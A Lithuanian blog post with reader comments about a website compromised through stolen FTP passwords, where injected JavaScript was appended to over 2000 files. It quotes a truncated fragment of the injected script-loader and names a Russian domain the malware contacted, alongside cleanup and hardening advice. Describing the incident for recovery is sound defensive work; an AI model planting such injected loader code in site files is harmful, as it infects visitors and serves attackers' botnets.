Jei pas jus įsilaužė į svetainę
Šiandien užsukęs į savo svetainę pamačiau, kad ji neveikia. Kadangi aš prieš tai tikrai nieko nekenčiau. Prisijungęs prie serverio per FTP pastebėjau, kad įterptas failo gale kodas:
/*GNU GPL*/ try{window.onload = function(){var Xs1ya4t7ajb13i = document.createElement(‘script’);Xs1ya4t7ajb13i.setAttribute(‘type’, ‘text/javascript’);[.. ir t.t. ..] catch(e) {}
Ir toks pakeitimas tikrai ne vienas, pakeista virš 2000 failų. Atakuojami failai (*.js, index.php(phtml|html|htm), main.php(phtml|html|htm). Visą failų sąrašą galima gauti pas adminus.
Gavęs sąrašą failų iš admino matosi, kad buvo panaudotas vos ne visas BOT tinklas, nes prisijungimai buvo daromi daugiau ne 10 (tingiu skaičiuoti) kompiuterių iš skirtingų tinklų.
Ką tokiu atveju daryti?
- Visų pirma pasikeisti FTP slaptažodžius
- Žinoma, naikinti kodus (nesmagus užsiėmimas)
- Pasitikrinti virusus savo kompe (ar ten kur yra jūsų prisijungimai)
- Ką dar siūlote?
Apsigreidinti wordpressą ;)
Aiškintis kaip buvo įsilaužta – jeigu problemos pas save neradai, gali būti, jog įsilaužta per patį serverį ar kitas svetaines serveryje, tada tavo visuotinė pareiga pranešti serverio administratoriams su kuo daugiau informacijos, jog jie patys galėtų tai ištirti. Bet nepranešinėk, jeigu nesi įsitikinęs, kad įsilaužta per tavo sistemą.
Blokuok bet kokius prisijungimus prie bet ko per ne tavo IP – šitai dažnai apsaugoja ne tik nuo tolimesnio įsilaužėlio naudojimosi sistema, bet ir nuo pačio įsilaužimo.
Naudok atsargines kopijas, jog galėtum greitai atsistatyti po tokių situacijų.
Kartą sukompromituotas daugiau nedarai tokį klaidų :) .
Buvo tokia pati situacija pas mane, tavciau kodas buvo truputi kitoks, jis atidarydavo puslapi, ą px frame ir jungdavosi i kinietiska serveri. Problema buvo nubruteforce'intas ftp slaptazodis.
Teko pereiti per daug katalogu, kad panaikinti evil koda is visur, jei turi shell access ir kodas visiskai identiskas tai si komanda pades:
# ieskoma fraze kataloge, be klaidu pranesimu
grep -s "ieskoma fraze" *
# tam tikroje direktorijoje pereina per failus iesko frazes radus, pakeicia
find /home/bruno/old-friends -type f -exec sed -i 's/SEARCH/REPLACE/g' {} ;
Kaip jau rašiau Vaidui twiteryje šio kenkėjiško kodo priežasčių reikėtų ieškoti pirmiausia pas save, po to pas visus kitus, kurie turi šio tinklalapio ftp loginus. Tai trojano darbas (trojan.downloader), kuris nuskaito įvairiose ftp programose užsaugotus loginus ir jungiasi jais, tam tikruose failuose palikdamas savo kenkėjišką kodą. Šiandien teko matyt panašų kodą kaip ir čia, kuris kreipiasi pvz į joomla.com.google.com.facebook.com.kazkas.ru (šiuo atveju .newterra.ru), kur slepiasi koks nors botneto CnC ar koks nors exploitas ar dar blogiau (reiktų tik turint noro patyrinėt).
Buvo prisijungta per FTP (tai ne wordpres bugas)
Klausimas kur pasigavo ;(
pas mane i parduotuve isilauze.. dabar taisome failus..
Dar pasakyk, kad Mac arba iPhone naudoji, kur "nėra virusų". :D
IMO, tai paprasčiausiai tiesiog Win 7 naudoti, kur kol kas nemačiau panašaus crap, nes update gana uoliai MS leidžia. :)
BTW, labai svarbu nepamiršt pasikeist ne tik FTP, bet ir būtinai būtinai MySQL slaptažodžius, nes jie būna matomi atvirai prisijungus per http://FTP...
Nors jei kalbėti apie konkretų virusą, tai bent jau ta atmaina, kurios pasekmes man teko tvarkyti vienam draugui, panašu, kad nebando vogti config.php ir panašių failų – tik koreguoja esamus (arba labai gerai pasislėpė FTP loguose).
Pas mane irgi tas shhh buvo. Uzknisa ziauriai ziauriai kai valyti reikia. Visa laime ne 2000 failu. Bet irgi apie 20 domenu, tai ilgai valiau. Siaip iseitis nesaugot slaptazodziu, bet kai megstu remote failus redaguoti, tai ziauru budavo slaptazodi pastinti kiekviena karta.
Be manes irgi yra zmoniu kurie dirba su projektais, tai po to ir neaisku kuris kompas buvo uzkrestas.
Pas hosterius prasiau, kad padarytu, kad tik is mano IP galima butu prie servo jungtis, bet jie atsisake(serveriai.lt), dabar mastau apie vps pirkima, ten lyg ir galima apriboti, kas per ftp jungiasi.
Tu toks ne vienintelis :)